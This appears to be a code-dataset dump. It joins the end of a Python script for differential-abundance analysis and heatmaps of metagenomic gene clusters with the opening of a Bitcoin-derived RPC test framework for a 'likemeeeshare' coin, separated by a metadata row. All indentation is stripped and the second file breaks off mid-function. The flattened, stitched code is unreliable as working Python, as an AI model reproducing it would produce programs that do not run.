row = pd.Series(group_meta, name="Metadata")
sign_fit_adj = gc_df.append(row).sort_values(by=["Metadata"], axis=1).T
sign_fit_adj = sign_fit_adj.replace(0, float(0.0))
sign_fit_adj = sign_fit_adj.groupby(["Metadata"]).mean().T
sign_fit_adj["log2_fold"] = sign_fit_adj[group1] - sign_fit_adj[group2]
log_fold = sign_fit_adj.drop([group1, group2], axis=1)
return log_fold
def structure_data(gc_df, cov, log_fold):
""" sort the data for the fitzig model
--------
hg_df
dataframe, relevant HGs
gc_df
dataframe, relevant GCs
cov
dataframe, relevant coverage
log_fold
dataframe, log2 fold change
returns
--------
hg_df = dataframe with the HG names as index and HG RPKMs as values
sorted_cov = dataframe with GC names as index and coverage scores as values
log_fold = dataframe with the log2 fold change
sorted_gc = dataframe with the GC names as index and GC RPKMs as values
"""
index_list = []
index_names = list(gc_df.index)
for index in index_names:
index_list.append(index.split("|")[1].split(".")[0])
gc_df = gc_df.replace(0, float(0.0))
# sort the dataframe on the mean coverage from high to low
cov_mean = cov.mean(axis=1)
sorted_gc = pd.concat([gc_df, cov_mean], axis=1, sort=True)
sorted_gc = (sorted_gc.sort_values(by=[0], ascending=False)).drop([0], axis=1)
# sort the coverage on the mean coverage
sorted_cov = pd.concat([cov, cov_mean], axis=1, sort=True)
sorted_cov = (sorted_cov.sort_values(by=[0], ascending=False)).drop([0], axis=1)
sorted_cov = pd.melt(sorted_cov.reset_index(), \
id_vars="index", var_name="group", value_name="cov")
# sort the log2 fold change on the mean coverage
sorted_log_fold = pd.concat([log_fold, cov_mean], axis=1, sort=True)
sorted_log_fold = (sorted_log_fold.sort_values(by=[0], ascending=False)).drop([0], axis=1)
return sorted_cov, sorted_log_fold, sorted_gc
def movetodir(outdir, dirname, pattern):
"""moves files matching a patterd into new directory
parameters
----------
outdir
string, the path to output directory
dirname
string, name of the new direcory
pattern
string, regex
returns
----------
None
"""
# Make directory
try:
os.mkdir(os.path.join(outdir, dirname))
except:
pass
# Move files into new directory
for f in os.listdir(outdir):
if re.search(pattern, f):
try:
shutil.move(os.path.join(outdir, f), os.path.join(outdir, dirname))
except:
pass
######################################################################
# VISUALIZATION
######################################################################
def make_explore(sign_gc, cov, metadata, metagroup, sample_type, outdir, \
file_name="explore_heatmap", sign_hg=""):
""" Creates the explore heatmap in pdf format.
----------
sign_GC
dataframe, rows contain samples, columns significant GCs, \
values are normalized RPKM
cov
dataframe, rows contain samples, columns GCs, values are coverage scores
sign_hg
dataframe, rows contain housekeeping gene functions, columns GCs IDs, \
values are RPKM
metadata
dict, {sample id: metadata}
metagroup
string, metagroup name
sample_type
string, metagenomic/metatranscriptomic
outdir
string, path to output directory
returns
----------
"""
y_axis_labels = []
percentage = []
pdf_file = os.path.join(outdir, f"{file_name}.pdf")
eps_file = os.path.join(outdir, f"{file_name}.eps")
index_names = list(sign_gc.index)
for name in index_names:
name_function = name.split("Entryname=")[1].split("--SMASH")[0]
gc_id = name.split("|")[1]
full_name=f"{name_function}--ID={gc_id}"
if len(full_name) > 80:
function, species = name_function.split("--OS=")
full_name=f"{function}\nOS={species}--ID={gc_id}"
y_axis_labels.append(full_name)
with PdfPages(pdf_file) as pdf:
fig = plt.figure(figsize=(90, 40))
fig.subplots_adjust(wspace=0.0, hspace=0.0) # space between the plots
# bar to display the groups
ax0 = plt.subplot2grid((15, 14), (0, 2), colspan=9, rowspan=1)
values, counts = np.unique(list(metadata.values()), return_counts=True)
for count in counts:
percentage.append(int(count)/sum(counts) * 100)
df = pd.DataFrame(list(zip(values, percentage)), columns=[metagroup, 'val'])
group_bar = df.set_index(metagroup).T.plot(kind='barh', stacked=True, \
ax=ax0, colormap='summer')
group_bar.axis('off')
plt.xlim([0, 100])
plt.title(f"Explore heatmap: {sample_type}", fontsize=60)
# places legends on different coordinates for metagenomic or metatranscriptomic data
if sample_type == "METAGENOMIC":
ax0.text(120, -4, 'Abundance (DNA)', fontsize=40)
legend = plt.legend(bbox_to_anchor=(1.31, -7), frameon=False, \
prop={'size': 35}, title=metagroup)
legend.get_title().set_fontsize('40')
cbar_ax = fig.add_axes([0.85, .52, .01, .1])
else:
ax0.text(125.4, -2.5, 'Expression (RNA)', fontsize=40)
legend = plt.legend(bbox_to_anchor=(1.37, -8.7), frameon=False, \
prop={'size': 35}, title=metagroup)
legend.get_title().set_fontsize('40')
cbar_ax = fig.add_axes([0.87, .60, .01, .1])
# heatmap of RPKM values on the first position of the grid
ax1 = plt.subplot2grid((14, 14), (1, 2), colspan=9, rowspan=14)
heatmap = sns.heatmap(sign_gc, ax=ax1, cbar_ax=cbar_ax, cmap='viridis', \
xticklabels=False, linewidths=.05, linecolor='black')
lower_half, upper_half = plt.ylim() # discover the values for bottom and top
lower_half += 0.5 # Add 0.5 to the bottom
upper_half -= 0.5 # Subtract 0.5 from the top
plt.ylim(lower_half, upper_half)
ax1.set_yticklabels(labels=y_axis_labels, rotation=0, fontsize=35)
# coverage barplot in the second position of the grid
ax2 = plt.subplot2grid((14, 14), (1, 11), colspan=1, rowspan=14)
coverage = sns.barplot(x=cov.mean(axis=1).sort_values(ascending=False), \
y=cov.index, ax=ax2, label="Coverage", color="grey")
plt.xlabel("Coverage", fontsize=40)
plt.tick_params(labelsize=30)
coverage.set(yticks=[])
if sample_type == "METATRANSCRIPTOMIC":
# housekeeping genes heatmap in the thirth position of the grid
ax3 = plt.subplot2grid((14, 14), (1, 12), colspan=1, rowspan=14)
cbar_ax = fig.add_axes([0.87, .40, .01, .1])
heatmap2 = sns.heatmap(sign_hg, xticklabels=True, \
linewidths=.01, linecolor='black', yticklabels=False, ax=ax3, \
cbar_ax=cbar_ax)
ax3.text(6.2, 8.4, 'Housekeeping \n genes', fontsize=40)
ax3.set_xticklabels(sign_hg.columns, rotation=90, fontsize=30)
ax3.set_ylabel('')
plt.savefig(eps_file, format='eps')
pdf.savefig()
return
def make_compare(sign_gc, log_fold, cov, metadata, metagroup, sample_type,\
outdir, groups, file_name, plot_type, alpha=0.15, sign_hg=""):
""" Creates the explore heatmap in pdf format
----------
sign_GC
dataframe, rows contain samples, columns significant GCs, \
values are normalized RPKM
cov
dataframe, rows contain samples, columns GCs, values are coverage scores
sign_hg
dataframe, rows contain housekeeping gene functions, columns GCs IDs, \
values are RPKM
metadata
dict, {sample id: metadata}
metagroup
string, metagroup name
sample_type
string, metagenomic/metatranscriptomic
outdir,
string, path to output directory
groups
list, names of the groups
alpha
float, cut-off value of fitZIG/Kruskal Wallis
returns
----------
"""
y_axis_labels = []
percentage = []
group1 = groups[0]
group2 = groups[1]
eps_file = os.path.join(outdir, f"{file_name}.eps")
pdf_file = os.path.join(outdir, f"{file_name}.pdf")
index_names = list(sign_gc.index)
for name in index_names:
name_function = name.split("Entryname=")[1].split("--SMASH")[0]
gc_id = name.split("|")[1]
full_name=f"{name_function}--ID={gc_id}"
if len(full_name) > 90:
function, species = name_function.split("--OS=")
full_name=f"{function}\nOS={species}--ID={gc_id}"
y_axis_labels.append(full_name)
with PdfPages(pdf_file) as pdf:
fig = plt.figure(figsize=(90, 40))
fig.subplots_adjust(wspace=0.0, hspace=0.0) # space between the plots
# bar to display the groups
ax0 = plt.subplot2grid((15, 15), (0, 3), colspan=8, rowspan=1)
values, counts = np.unique(list(metadata.values()), return_counts=True)
for count in counts:
percentage.append(int(count)/sum(counts) * 100)
df = pd.DataFrame(list(zip(values, percentage)), columns=[metagroup, 'val'])
group_bar = df.set_index(metagroup).T.plot(kind='barh', stacked=True, \
ax=ax0, colormap='summer')
group_bar.axis('off')
plt.xlim([0, 100])
if plot_type == "fitzig":
plt.title(\
f"fitZIG model: {sample_type} \n p<{alpha} -- {group1} vs {group2}", fontsize=60)
else:
plt.title(\
f"Kruskal Wallis model: {sample_type} \n p<{alpha} -- {group1} vs {group2}", fontsize=60)
# places legends on different coordinates for metagenomic or metatranscriptomic data
if sample_type == "METAGENOMIC":
ax0.text(126.0, -4.3, 'Abundance (DNA)', fontsize=40)
legend = plt.legend(bbox_to_anchor=(1.40, -6.9), frameon=False, \
prop={'size': 35}, title=metagroup)
legend.get_title().set_fontsize('40')
cbar_ax = fig.add_axes([0.82, .52, .01, .1])
else:
ax0.text(140.4, -2.5, 'Expression (RNA)', fontsize=40)
legend = plt.legend(bbox_to_anchor=(1.54, -10.5), frameon=False, \
prop={'size': 35}, title=metagroup)
legend.get_title().set_fontsize('40')
cbar_ax = fig.add_axes([0.87, .60, .01, .1])
# heatmap of RPKM values on the first position of the grid
ax1 = plt.subplot2grid((14, 15), (1, 3), colspan=8, rowspan=14)
heatmap = sns.heatmap(sign_gc, ax=ax1, cbar_ax=cbar_ax, cmap='viridis', \
xticklabels=False, linewidths=.05, linecolor='black')
lower_half, upper_half = plt.ylim() # discover the values for bottom and top
lower_half += 0.5 # Add 0.5 to the bottom
upper_half -= 0.5 # Subtract 0.5 from the top
plt.ylim(lower_half, upper_half)
ax1.set_yticklabels(labels=y_axis_labels, rotation=0, fontsize=35)
# log2 fold-change barplot in the second position of the grid
ax2 = plt.subplot2grid((14, 15), (1, 11), colspan=1, rowspan=14)
log2_fc = sns.barplot(x=log_fold.mean(axis=1), \
y=log_fold.index, ax=ax2, label="LFC", color="grey")
plt.xlabel("Log2 fc", fontsize=40)
plt.tick_params(labelsize=30)
log2_fc.set(yticks=[])
# coverage stripplot in the thirth position of the grid
ax3 = plt.subplot2grid((14, 15), (1, 12), colspan=1, rowspan=14)
coverage = sns.stripplot(data=cov, y="index", hue="group", x="cov", ax=ax3, size=20)
plt.xlabel("cov", fontsize=40)
plt.ylabel(None)
plt.tick_params(labelsize=30)
coverage.set(yticks=[])
if sample_type == "METATRANSCRIPTOMIC":
legend2 = plt.legend(loc='center left', bbox_to_anchor=(2.3, 0.32), frameon=False, \
prop={'size': 35}, title="Coverage", markerscale=3)
legend2.get_title().set_fontsize('40')
# housekeeping genes heatmap in the fourth position of the grid
ax4 = plt.subplot2grid((14, 15), (1, 13), colspan=1, rowspan=14)
cbar_ax = fig.add_axes([0.87, .40, .01, .1])
heatmap2 = sns.heatmap(sign_hg, xticklabels=True, \
linewidths=.01, linecolor='black', yticklabels=False, ax=ax4, \
cbar_ax=cbar_ax)
ax4.text(1.7, 0.6, 'Housekeeping \n genes', horizontalalignment='center', \
verticalalignment='center', transform=ax4.transAxes, fontsize=40)
ax4.set_xticklabels(sign_hg.columns, rotation=90, fontsize=30)
ax4.set_ylabel('')
ax4.set_xlabel('')
else:
legend2 = plt.legend(loc='center left', bbox_to_anchor=(1.2, 0.34), frameon=False, \
prop={'size': 35}, title="Coverage", markerscale=3)
legend2.get_title().set_fontsize('40')
plt.savefig(eps_file, format='eps')
pdf.savefig()
return
######################################################################
# MAIN
######################################################################
def main():
"""
Steps
--------
1) Load the biom file and convert to a dictionary
2) Filter the biom dict on the inputted metatype and convert to a pandas dataframe
3) Normalize the data based on the normalization of metagenomeSeq
4) Structure the data and create the explore heatmap if requested
5) Run the Kruskall-Wallis test if requested
6) Run the fit-ZIG model if requested
"""
args = get_arguments()
matplotlib.use('agg')
if not args.compare and not args.explore:
print("Please use the --compare or --explore flag")
sys.exit()
sample_type = (args.sample_type).upper()
#create output dir if it does not exist
if not os.path.exists(args.outdir):
os.makedirs(args.outdir)
# Creating json formatted file from biom
print("__________Loading biom file_______________________")
json_file = export2biom(args.biom_file, args.outdir)
with open(json_file, "r") as jfile:
biom_dict = json.load(jfile)
# Filtering input data
sample_index, sample_list, metadata = get_sample_type(sample_type, \
biom_dict, args.metagroup)
index_list = filter_rows(biom_dict, sample_index)
gc_values = get_gc_ids(biom_dict, index_list, sample_index)
# Making a pandas dataframe and normalize the data
gc_df = make_dataframe(gc_values, sample_list)
norm_df = norm_log2_data(gc_df)
gc_df.to_csv((os.path.join(args.outdir, 'all_RPKMs.tsv')), sep='\t')
norm_df.to_csv((os.path.join(args.outdir, 'all_RPKMs_norm.tsv')), sep='\t')
if args.explore:
print("__________Making explore heatmap__________________")
# Extract the coverage scores from the BIOM file
dict_cov = get_coverage(biom_dict, sample_list, list(gc_values.keys()))
cov = make_dataframe(dict_cov, sample_list)
cov.to_csv((os.path.join(args.outdir, 'coverage.tsv')), sep='\t')
sign_gc, sign_cov = best_cov(cov, norm_df, args.threshold)
# Make the explore heatmap
if sample_type == "METATRANSCRIPTOMIC":
gc_names, sign_hg, id_list = get_relevant_hg(sign_gc, norm_df)
pandas_hg = make_hg_df(gc_names, sign_hg, id_list, norm_df)
gc_sorted, meta_types = sort_coverage(sign_gc, sign_cov, metadata)
hg_sorted = sort_housekeeping(sign_gc, pandas_hg, sign_cov)
hg_sorted.to_csv((os.path.join(args.outdir, 'explore_HGs.tsv')), sep='\t')
gc_sorted.to_csv((os.path.join(args.outdir, 'explore_GCs.tsv')), sep='\t')
if args.file_name_explore:
make_explore(gc_sorted, sign_cov, metadata, args.metagroup, \
sample_type, args.outdir, args.file_name_explore, hg_sorted)
else:
make_explore(gc_sorted, sign_cov, metadata, args.metagroup, \
sample_type, args.outdir, "explore_heatmap", hg_sorted)
else:
gc_sorted, meta_types = sort_coverage(sign_gc, sign_cov, metadata)
gc_sorted.to_csv((os.path.join(args.outdir, 'explore_GCs.tsv')), sep='\t')
if args.file_name_explore:
make_explore(gc_sorted, sign_cov, metadata, args.metagroup, \
sample_type, args.outdir, args.file_name_explore)
else:
make_explore(gc_sorted, sign_cov, metadata, args.metagroup, \
sample_type, args.outdir)
if not args.compare:
os.remove(os.path.join(args.outdir + "BiG-MAP.table.txt"))
movetodir(args.outdir + os.sep, "tsv-results", ".tsv")
if args.compare and args.groups:
group1 = args.groups[0]
group2 = args.groups[1]
print("__________Kruskal-wallis model____________________")
# run the Kruskal Wallis model
kruskal_results = kruskal_wallis(norm_df, metadata, args.groups)
# parse the output and get the significant GCs
sign_kw, meta_types = parse_results(kruskal_results, norm_df, args.groups, \
metadata, args.alpha_kruskal, "kruskal")
if args.file_names_compare and len(args.file_names_compare) == 2:
kruskal_file = args.file_names_compare[0]
fitzig_file = args.file_names_compare[1]
elif args.file_names_compare and len(args.file_names_compare) != 2:
print("Please input two output file names for the Kruskal-Wallis \
and fitZIG heatmaps. For instance: UCvsCD_kw UCvsCD_fz")
else:
kruskal_file = f"{group1}vs{group2}_kw"
fitzig_file = f"{group1}vs{group2}_fz"
if meta_types == []:
pass
else:
# get coverage
dict_cov = get_coverage(biom_dict, list(sign_kw), sign_kw.index)
cov = make_dataframe(dict_cov, list(sign_kw))
cov, group_meta = order_coverage(metadata, cov, args.groups)
# get log2 fold change
log_fold = get_log2fold(sign_kw, args.groups, group_meta)
if sample_type == "METATRANSCRIPTOMIC":
# get the relevant housekeeping genes
gc_names, sign_hg, id_list = get_relevant_hg(sign_kw, norm_df)
kw_hg_pandas = make_hg_df(gc_names, sign_hg, id_list, \
norm_df, args.groups, metadata)
sorted_cov, log_fold, sorted_gc = structure_data(sign_kw, cov, log_fold)
kw_hg_pandas = sort_housekeeping(sign_kw, kw_hg_pandas, cov)
kw_hg_pandas = kw_hg_pandas.replace(np.nan, 0.0)
kw_hg_pandas.to_csv((os.path.join(args.outdir, \
f'{group1}vs{group2}_HG_kw.tsv')), sep='\t')
sorted_gc.to_csv((os.path.join(args.outdir, \
f'{group1}vs{group2}_GC_kw.tsv')), sep='\t')
# make the kruskal wallis figure
make_compare(sorted_gc, log_fold, sorted_cov, group_meta, args.metagroup, \
sample_type, args.outdir, args.groups, kruskal_file, "kruskal", \
args.alpha_kruskal, kw_hg_pandas)
else:
sorted_cov, log_fold, sorted_gc = structure_data(sign_kw, cov, log_fold)
sorted_gc.to_csv((os.path.join(args.outdir, \
f'{group1}vs{group2}_GC_kw.tsv')), sep='\t')
# make the kruskal wallis figure
make_compare(sorted_gc, log_fold, sorted_cov, group_meta, args.metagroup, \
sample_type, args.outdir, args.groups, kruskal_file, "kruskal", args.alpha_kruskal)
print("__________Fit-ZIG model____________________")
# run the fitzig model in R
fitzig_results = run_fit_zig(args.biom_file, args.groups, args.metagroup, biom_dict, args.outdir)
# parse the output and get the significant GCs
sign_fit, meta_types = parse_results(fitzig_results, norm_df, args.groups, metadata, \
args.alpha_fitzig, "fitzig")
# get coverage
dict_cov = get_coverage(biom_dict, list(sign_fit), sign_fit.index)
cov = make_dataframe(dict_cov, list(sign_fit))
cov, group_meta = order_coverage(metadata, cov, args.groups)
# get log2 fold change
log_fold = get_log2fold(sign_fit, args.groups, group_meta)
if sample_type == "METATRANSCRIPTOMIC":
# get the relevant housekeeping genes
gc_names, sign_hg, id_list = get_relevant_hg(sign_fit, norm_df)
fit_hg_pandas = make_hg_df(gc_names, sign_hg, id_list, norm_df, args.groups, metadata)
sorted_cov, log_fold, sorted_gc= structure_data(sign_fit, cov, log_fold)
fit_hg_pandas = sort_housekeeping(sign_fit, fit_hg_pandas, cov)
fit_hg_pandas = fit_hg_pandas.replace(np.nan, 0.0)
fit_hg_pandas.to_csv((os.path.join(args.outdir, \
f'{group1}vs{group2}_HG_fz.tsv')), sep='\t')
sorted_gc.to_csv((os.path.join(args.outdir, \
f'{group1}vs{group2}_GC_fz.tsv')), sep='\t')
# make the fitzig figure
make_compare(sorted_gc, log_fold, sorted_cov, group_meta, args.metagroup, \
sample_type, args.outdir, args.groups, fitzig_file, "fitzig", args.alpha_fitzig, fit_hg_pandas)
else:
sorted_cov, log_fold, sorted_gc = structure_data(sign_fit, cov, log_fold)
sorted_gc.to_csv((os.path.join(args.outdir, \
f'{group1}vs{group2}_GC_fz.tsv')), sep='\t')
# make the fitzig figure
make_compare(sorted_gc, log_fold, sorted_cov, group_meta, args.metagroup, \
sample_type, args.outdir, args.groups, fitzig_file, "fitzig", args.alpha_fitzig)
os.remove(os.path.join(args.outdir + "/BiG-MAP.table.txt"))
movetodir(args.outdir + os.sep, "tsv-results", ".tsv")
if args.compare and not args.groups:
print("Please provide the group information")
sys.exit()
if __name__ == "__main__":
main()
| 42.021079 | 107 | 0.61051 |
4a1e4e6652844572d646069d018da79840be98ab | 20,320 | py | Python | test/functional/test_framework/test_framework.py | aravinth-elangovan/likemeshare | fe97a92a3516c63f3feddad2b9462362a3178f16 | [
"MIT"
] | null | null | null | test/functional/test_framework/test_framework.py | aravinth-elangovan/likemeshare | fe97a92a3516c63f3feddad2b9462362a3178f16 | [
"MIT"
] | null | null | null | test/functional/test_framework/test_framework.py | aravinth-elangovan/likemeshare | fe97a92a3516c63f3feddad2b9462362a3178f16 | [
"MIT"
] | 1 | 2021-03-02T12:51:18.000Z | 2021-03-02T12:51:18.000Z | #!/usr/bin/env python3
# Copyright (c) 2014-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Base class for RPC testing."""
from collections import deque
from enum import Enum
import logging
import optparse
import os
import pdb
import shutil
import sys
import tempfile
import time
import traceback
from .authproxy import JSONRPCException
from . import coverage
from .test_node import TestNode
from .util import (
MAX_NODES,
PortSeed,
assert_equal,
check_json_precision,
connect_nodes_bi,
disconnect_nodes,
initialize_datadir,
log_filename,
p2p_port,
set_node_times,
sync_blocks,
sync_mempools,
)
class TestStatus(Enum):
PASSED = 1
FAILED = 2
SKIPPED = 3
TEST_EXIT_PASSED = 0
TEST_EXIT_FAILED = 1
TEST_EXIT_SKIPPED = 77
class BitcoinTestFramework(object):
"""Base class for a likemeeeshare test script.
Individual likemeeeshare test scripts should subclass this class and override the set_test_params() and run_test() methods.
Individual tests can also override the following methods to customize the test setup:
- add_options()
- setup_chain()
- setup_network()
- setup_nodes()
The __init__() and main() methods should not be overridden.
This class also contains various public and private helper methods."""
def __init__(self):
"""Sets test framework defaults. Do not override this method. Instead, override the set_test_params() method"""
self.setup_clean_chain = False
self.nodes = []
self.mocktime = 0
self.set_test_params()
assert hasattr(self, "num_nodes"), "Test must set self.num_nodes in set_test_params()"
def main(self):
"""Main function. This should not be overridden by the subclass test scripts."""
parser = optparse.OptionParser(usage="%prog [options]")
parser.add_option("--nocleanup", dest="nocleanup", default=False, action="store_true",
help="Leave likemeeeshareds and test.* datadir on exit or error")
parser.add_option("--noshutdown", dest="noshutdown", default=False, action="store_true",
help="Don't stop likemeeeshareds after the test execution")
parser.add_option("--srcdir", dest="srcdir", default=os.path.normpath(os.path.dirname(os.path.realpath(__file__)) + "/../../../src"),
help="Source directory containing likemeeeshared/likemeeeshare-cli (default: %default)")
parser.add_option("--cachedir", dest="cachedir", default=os.path.normpath(os.path.dirname(os.path.realpath(__file__)) + "/../../cache"),
help="Directory for caching pregenerated datadirs")
parser.add_option("--tmpdir", dest="tmpdir", help="Root directory for datadirs")
parser.add_option("-l", "--loglevel", dest="loglevel", default="INFO",
help="log events at this level and higher to the console. Can be set to DEBUG, INFO, WARNING, ERROR or CRITICAL. Passing --loglevel DEBUG will output all logs to console. Note that logs at all levels are always written to the test_framework.log file in the temporary test directory.")
parser.add_option("--tracerpc", dest="trace_rpc", default=False, action="store_true",
help="Print out all RPC calls as they are made")
parser.add_option("--portseed", dest="port_seed", default=os.getpid(), type='int',
help="The seed to use for assigning port numbers (default: current process id)")
parser.add_option("--coveragedir", dest="coveragedir",
help="Write tested RPC commands into this directory")
parser.add_option("--configfile", dest="configfile",
help="Location of the test framework config file")
parser.add_option("--pdbonfailure", dest="pdbonfailure", default=False, action="store_true",
help="Attach a python debugger if test fails")
self.add_options(parser)
(self.options, self.args) = parser.parse_args()
PortSeed.n = self.options.port_seed
os.environ['PATH'] = self.options.srcdir + ":" + self.options.srcdir + "/qt:" + os.environ['PATH']
check_json_precision()
self.options.cachedir = os.path.abspath(self.options.cachedir)
# Set up temp directory and start logging
if self.options.tmpdir:
self.options.tmpdir = os.path.abspath(self.options.tmpdir)
os.makedirs(self.options.tmpdir, exist_ok=False)
else:
self.options.tmpdir = tempfile.mkdtemp(prefix="test")
self._start_logging()
success = TestStatus.FAILED
try:
self.setup_chain()
self.setup_network()
self.run_test()
success = TestStatus.PASSED
except JSONRPCException as e:
self.log.exception("JSONRPC error")
except SkipTest as e:
self.log.warning("Test Skipped: %s" % e.message)
success = TestStatus.SKIPPED
except AssertionError as e:
self.log.exception("Assertion failed")
except KeyError as e:
self.log.exception("Key error")
except Exception as e:
self.log.exception("Unexpected exception caught during testing")
except KeyboardInterrupt as e:
self.log.warning("Exiting after keyboard interrupt")
if success == TestStatus.FAILED and self.options.pdbonfailure:
print("Testcase failed. Attaching python debugger. Enter ? for help")
pdb.set_trace()
if not self.options.noshutdown:
self.log.info("Stopping nodes")
if self.nodes:
self.stop_nodes()
else:
self.log.info("Note: likemeeeshareds were not stopped and may still be running")
if not self.options.nocleanup and not self.options.noshutdown and success != TestStatus.FAILED:
self.log.info("Cleaning up")
shutil.rmtree(self.options.tmpdir)
else:
self.log.warning("Not cleaning up dir %s" % self.options.tmpdir)
if os.getenv("PYTHON_DEBUG", ""):
# Dump the end of the debug logs, to aid in debugging rare
# travis failures.
import glob
filenames = [self.options.tmpdir + "/test_framework.log"]
filenames += glob.glob(self.options.tmpdir + "/node*/regtest/debug.log")
MAX_LINES_TO_PRINT = 1000
for fn in filenames:
try:
with open(fn, 'r') as f:
print("From", fn, ":")
print("".join(deque(f, MAX_LINES_TO_PRINT)))
except OSError:
print("Opening file %s failed." % fn)
traceback.print_exc()
if success == TestStatus.PASSED:
self.log.info("Tests successful")
sys.exit(TEST_EXIT_PASSED)
elif success == TestStatus.SKIPPED:
self.log.info("Test skipped")
sys.exit(TEST_EXIT_SKIPPED)
else:
self.log.error("Test failed. Test logging available at %s/test_framework.log", self.options.tmpdir)
logging.shutdown()
sys.exit(TEST_EXIT_FAILED)
# Methods to override in subclass test scripts.
def set_test_params(self):
"""Tests must this method to change default values for number of nodes, topology, etc"""
raise NotImplementedError
def add_options(self, parser):
"""Override this method to add command-line options to the test"""
pass
def setup_chain(self):
"""Override this method to customize blockchain setup"""
self.log.info("Initializing test directory " + self.options.tmpdir)
if self.setup_clean_chain:
self._initialize_chain_clean()
else:
self._initialize_chain()
def setup_network(self):
"""Override this method to customize test network topology"""
self.setup_nodes()
# Connect the nodes as a "chain". This allows us
# to split the network between nodes 1 and 2 to get
# two halves that can work on competing chains.
for i in range(self.num_nodes - 1):
connect_nodes_bi(self.nodes, i, i + 1)
self.sync_all()
def setup_nodes(self):
"""Override this method to customize test node setup"""
extra_args = None
if hasattr(self, "extra_args"):
extra_args = self.extra_args
self.add_nodes(self.num_nodes, extra_args)
self.start_nodes()
def run_test(self):
"""Tests must override this method to define test logic"""
raise NotImplementedError
# Public helper methods. These can be accessed by the subclass test scripts.
def add_nodes(self, num_nodes, extra_args=None, rpchost=None, timewait=None, binary=None):
"""Instantiate TestNode objects"""
if extra_args is None:
extra_args = [[]] * num_nodes
if binary is None:
binary = [None] * num_nodes
assert_equal(len(extra_args), num_nodes)
assert_equal(len(binary), num_nodes)
for i in range(num_nodes):
self.nodes.append(TestNode(i, self.options.tmpdir, extra_args[i], rpchost, timewait=timewait, binary=binary[i], stderr=None, mocktime=self.mocktime, coverage_dir=self.options.coveragedir))
def start_node(self, i, extra_args=None, stderr=None):
"""Start a likemeeeshared"""
node = self.nodes[i]
node.start(extra_args, stderr)
node.wait_for_rpc_connection()
if self.options.coveragedir is not None:
coverage.write_all_rpc_commands(self.options.coveragedir, node.rpc)
def start_nodes(self, extra_args=None):
"""Start multiple likemeeeshareds"""
if extra_args is None:
extra_args = [None] * self.num_nodes
assert_equal(len(extra_args), self.num_nodes)
try:
for i, node in enumerate(self.nodes):
node.start(extra_args[i])
for node in self.nodes:
node.wait_for_rpc_connection()
except:
# If one node failed to start, stop the others
self.stop_nodes()
raise
if self.options.coveragedir is not None:
for node in self.nodes:
coverage.write_all_rpc_commands(self.options.coveragedir, node.rpc)
def stop_node(self, i):
"""Stop a bitcoind test node"""
self.nodes[i].stop_node()
self.nodes[i].wait_until_stopped()
def stop_nodes(self):
"""Stop multiple bitcoind test nodes"""
for node in self.nodes:
# Issue RPC to stop nodes
node.stop_node()
for node in self.nodes:
# Wait for nodes to stop
node.wait_until_stopped()
def assert_start_raises_init_error(self, i, extra_args=None, expected_msg=None):
with tempfile.SpooledTemporaryFile(max_size=2**16) as log_stderr:
try:
self.start_node(i, extra_args, stderr=log_stderr)
self.stop_node(i)
except Exception as e:
assert 'likemeeeshared exited' in str(e) # node must have shutdown
self.nodes[i].running = False
self.nodes[i].process = None
if expected_msg is not None:
log_stderr.seek(0)
stderr = log_stderr.read().decode('utf-8')
if expected_msg not in stderr:
raise AssertionError("Expected error \"" + expected_msg + "\" not found in:\n" + stderr)
else:
if expected_msg is None:
assert_msg = "likemeeeshared should have exited with an error"
else:
assert_msg = "likemeeeshared should have exited with expected error " + expected_msg
raise AssertionError(assert_msg)
def wait_for_node_exit(self, i, timeout):
self.nodes[i].process.wait(timeout)
def split_network(self):
"""
Split the network of four nodes into nodes 0/1 and 2/3.
"""
disconnect_nodes(self.nodes[1], 2)
disconnect_nodes(self.nodes[2], 1)
self.sync_all([self.nodes[:2], self.nodes[2:]])
def join_network(self):
"""
Join the (previously split) network halves together.
"""
connect_nodes_bi(self.nodes, 1, 2)
self.sync_all()
def sync_all(self, node_groups=None):
if not node_groups:
node_groups = [self.nodes]
for group in node_groups:
sync_blocks(group)
sync_mempools(group)
def enable_mocktime(self):
"""Enable mocktime for the script.
mocktime may be needed for scripts that use the cached version of the
blockchain. If the cached version of the blockchain is used without
mocktime then the mempools will not sync due to IBD.
For backwared compatibility of the python scripts with previous
versions of the cache, this helper function sets mocktime to Jan 1,
2014 + (201 * 10 * 60)"""
self.mocktime = 1388534400 + (201 * 10 * 60)
def disable_mocktime(self):
self.mocktime = 0
# Private helper methods. These should not be accessed by the subclass test scripts.
def _start_logging(self):
# Add logger and logging handlers
self.log = logging.getLogger('TestFramework')
self.log.setLevel(logging.DEBUG)
# Create file handler to log all messages
fh = logging.FileHandler(self.options.tmpdir + '/test_framework.log')
fh.setLevel(logging.DEBUG)
# Create console handler to log messages to stderr. By default this logs only error messages, but can be configured with --loglevel.
ch = logging.StreamHandler(sys.stdout)
# User can provide log level as a number or string (eg DEBUG). loglevel was caught as a string, so try to convert it to an int
ll = int(self.options.loglevel) if self.options.loglevel.isdigit() else self.options.loglevel.upper()
ch.setLevel(ll)
# Format logs the same as bitcoind's debug.log with microprecision (so log files can be concatenated and sorted)
formatter = logging.Formatter(fmt='%(asctime)s.%(msecs)03d000 %(name)s (%(levelname)s): %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
formatter.converter = time.gmtime
fh.setFormatter(formatter)
ch.setFormatter(formatter)
# add the handlers to the logger
self.log.addHandler(fh)
self.log.addHandler(ch)
if self.options.trace_rpc:
rpc_logger = logging.getLogger("LikemeeeshareRPC")
rpc_logger.setLevel(logging.DEBUG)
rpc_handler = logging.StreamHandler(sys.stdout)
rpc_handler.setLevel(logging.DEBUG)
rpc_logger.addHandler(rpc_handler)
def _initialize_chain(self):
"""Initialize a pre-mined blockchain for use by the test.
Create a cache of a 200-block-long chain (with wallet) for MAX_NODES
Afterward, create num_nodes copies from the cache."""
assert self.num_nodes <= MAX_NODES
create_cache = False
for i in range(MAX_NODES):
if not os.path.isdir(os.path.join(self.options.cachedir, 'node' + str(i))):
create_cache = True
break
if create_cache:
self.log.debug("Creating data directories from cached datadir")
# find and delete old cache directories if any exist
for i in range(MAX_NODES):
if os.path.isdir(os.path.join(self.options.cachedir, "node" + str(i))):
shutil.rmtree(os.path.join(self.options.cachedir, "node" + str(i)))
# Create cache directories, run bitcoinds:
for i in range(MAX_NODES):
datadir = initialize_datadir(self.options.cachedir, i)
args = [os.getenv("LITECOIND", "likemeeeshared"), "-server", "-keypool=1", "-datadir=" + datadir, "-discover=0"]
if i > 0:
